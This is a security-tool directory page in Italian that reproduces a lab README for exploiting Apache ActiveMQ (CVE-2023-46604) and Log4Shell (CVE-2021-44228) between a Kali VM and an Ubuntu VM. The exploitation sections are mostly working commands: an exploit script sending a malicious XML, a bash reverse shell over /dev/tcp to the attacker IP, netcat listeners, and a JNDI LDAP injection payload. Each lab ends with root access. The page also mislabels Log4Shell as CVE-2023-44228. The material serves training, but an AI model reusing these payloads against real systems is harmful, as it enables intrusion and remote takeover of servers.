Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-Lab — Istruzioni per sfruttare le vulnerabilità CVE-2021-44228 e CVE-2023-46604 | Kitploit
Strumenti/GitHubGitHub/dcm2406/cve-lab
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubdcm2406/cve-lab

CVE-Lab

Istruzioni per sfruttare le vulnerabilità CVE-2021-44228 e CVE-2023-46604

Vedi Repository
22 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-46604 Lab

Questo laboratorio guida allo sfruttamento delle vulnerabilità di CVE-2023-46604

Ringraziamenti

  • Apache ActiveMQ
  • CVE-2023-46604

Ambiente

Questo laboratorio richiede l'installazione di 2 macchine virtuali. Una macchina Kali Linux versione 2023.4 e una macchina Ubuntu versione 22.04.3 LTS. Puoi scaricarle qui:

  • Kali Linux 2023.4
  • Ubuntu 22.04.3 LTS
  • VMware-workstation-17.5.0 for windows
  • VMware-workstation-17.5.0 for linux

Modello e requisiti di sistema

Sulla macchina Kali Linux:

Installa git

root@kitploit:~
$sudo apt install git

Installa gedit

root@kitploit:~
$sudo apt install gedit

Sulla macchina Ubuntu:

Installa git

root@kitploit:~
$sudo apt install git

Installa openjdk 18

root@kitploit:~
$sudo apt install openjdk-18-jdk

Installa il pacchetto ActiveMQ 5.18.2

root@kitploit:~
$sudo su
$git clone https://github.com/dcm2406/ApacheActiveMQ
$cd ApacheActiveMQ/
$tar -xf apache-activemq-5.18.2-bin.tar.gz

Avvio del server (avvia il servizio ActiveMQ)

Sulla macchina Ubuntu Apri una finestra di terminale ed esegui il comando come indicato di seguito:

root@kitploit:~
$sudo su
$cd ApacheActiveMQ/apache-activemq-5.18.2/bin/linux-x86-64
$./activemq start

Controlla lo stato del servizio:

root@kitploit:~
$./activemq status

Se il servizio si avvia correttamente, sullo schermo del terminale verrà visualizzato il messaggio "ActiveMQ Brocker is running".

Puoi anche visitare http://127.0.0.1:8161 per aprire il manager del broker ActiveMQ. Include hostname, versione, ID, tempo di attività e altre informazioni.

Sfruttamento

Sulla macchina Kali Linux

Scarica le risorse per il processo di sfruttamento:

root@kitploit:~
$sudo su
$git clone https://github.com/dcm2406/CVE-2023-46604
$cd CVE-2023-46604
$ls

Come puoi vedere, abbiamo 2 file: exploit.py e poc.xml:

  • Il file poc.xml contiene un frammento di codice malevolo che sfrutta una vulnerabilità nel protocollo OpenWire.
  • Il file exploit.py è responsabile della cifratura HTTP e dell'invio del file poc.xml al broker sulla macchina di destinazione. Avvia un server web nel percorso delle risorse:
root@kitploit:~
$cd CVE-2023-46604
$python3 -m http.server

Apri una nuova finestra di terminale per inviare il file poc.xml al server di destinazione tramite il file exploit.py:

root@kitploit:~
$sudo su
$cd CVE-2023-46604
$python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml

Dopo l'esecuzione del comando, l'applicazione Calcolatrice viene avviata sulla macchina di destinazione. Questo dimostra che la vulnerabilità è stata sfruttata con successo. Procediamo quindi a creare una reverse shell per controllare la macchina di destinazione.

Apri una nuova finestra di terminale per rimanere in ascolto di connessioni reverse shell:

root@kitploit:~
$sudo su
$nc -nlvp 4444

Torna al terminale precedente e modifica il file poc.xml:

root@kitploit:~
$gedit poc.xml

Sostituisci il valore gnome-calculator con bash -i >& /dev/tcp/192.168.132.130/4444 0>&1 e salva il file.

Invia di nuovo il codice malevolo:

root@kitploit:~
$python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml

Il risultato di questo comando è che abbiamo ottenuto la root shell sulla macchina di destinazione. ROOTED!!!

CVE-2021-44228 Lab

Ringraziamenti

  • Apache log4j
  • CVE-2023-44228 - log4shell

Ambiente

Questo laboratorio richiede l'installazione di 2 macchine virtuali. Una macchina Kali Linux versione 2023.4 e una macchina Ubuntu versione 22.04.3 LTS. Puoi scaricarle qui:

  • Kali Linux 2023.4
  • Ubuntu 22.04.3 LTS
  • VMware-workstation-17.5.0 for windows
  • VMware-workstation-17.5.0 for linux

Modello e requisiti di sistema

Sulla macchina Kali Linux:

Installa git

root@kitploit:~
$sudo apt install git

Installa gedit

root@kitploit:~
$sudo apt install gedit

Sulla macchina Ubuntu:

Installa git

root@kitploit:~
$sudo apt install git

Installa docker

root@kitploit:~
$sudo apt install docker.io 

Creazione del server web

Sulla macchina Ubuntu

Passaggio 1: Scarica openjdk

root@kitploit:~
$sudo su
$wget https://www.cs.ait.ac.th/~marikhu/installers/jdk-8u20-linux-x64.tar.gz
$tar -xf jdk-8u20-linux-x64.tar.gz

Passaggio 2: Scarica e crea il file docker

root@kitploit:~
$sudo su
$git clone https://github.com/dcm2406/web-server-cve44228
root@kitploit:~
$docker build -t cve44228
$docker run --network host cve44228

Dopo aver completato i comandi precedenti, abbiamo un sito web. Per navigare sul web, puoi usare l'URL: http://<ubuntu_ip>:8080. In questo tutorial, l'indirizzo sarà simile a: http://192.168.132.135:8080

Sfruttamento

Sulla macchina Kali Linux, scarica le risorse necessarie per sfruttare la vulnerabilità

Scarica il poc

root@kitploit:~
$sudo su
$git clone https://github.com/kozmer/log4j-shell-poc
$pip install -r requirement.txt

Scarica openjdk

root@kitploit:~
$sudo su
$wget https://www.cs.ait.ac.th/~marikhu/installers/jdk-8u20-linux-x64.tar.gz

//move the openjdk file to the directory containing the poc file
$mv jdk-8u20-linux-x64.tar.gz <path to the directory containing the poc file>

$tar -xf jdk-8u20-linux-x64.tar.gz   //unzip the file

Apri un nuovo terminale per rimanere in ascolto di connessioni reverse shell:

root@kitploit:~
$sudo su
$nc -nlvp 9001

Avvia i servizi LDAP e HTTP con il file poc

root@kitploit:~
$sudo su
$cd log4j-shell-poc
$python3 poc.py --userip 192.168.132.130 --lport 9001 --webport 8080

Il comando restituirà risultati simili ai seguenti

root@kitploit:~
[!] CVE: CVE-2021-44228
Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up LDAP server

[+] Send me: ${jndi:ldap://192.168.132.130:1389/a}

[+] Starting Webserver on port 8080 http://0.0.0.0:8080
Listening on 0.0.0.0:1389

Qui siamo interessati solo al valore jndi generato. Apri un browser web e inserisci l'indirizzo del sito web creato in precedenza. Accedi utilizzando il valore jndi. A questo punto, il terminale netcat riceve una connessione. ROOTED!!!

Documentazione

Report di ricerca sulla CVE

Assistenza

Per assistenza, invia un'email a [email protected]

Autori

  • @dcm2406
  • @tCu0n9
Scarica lo strumento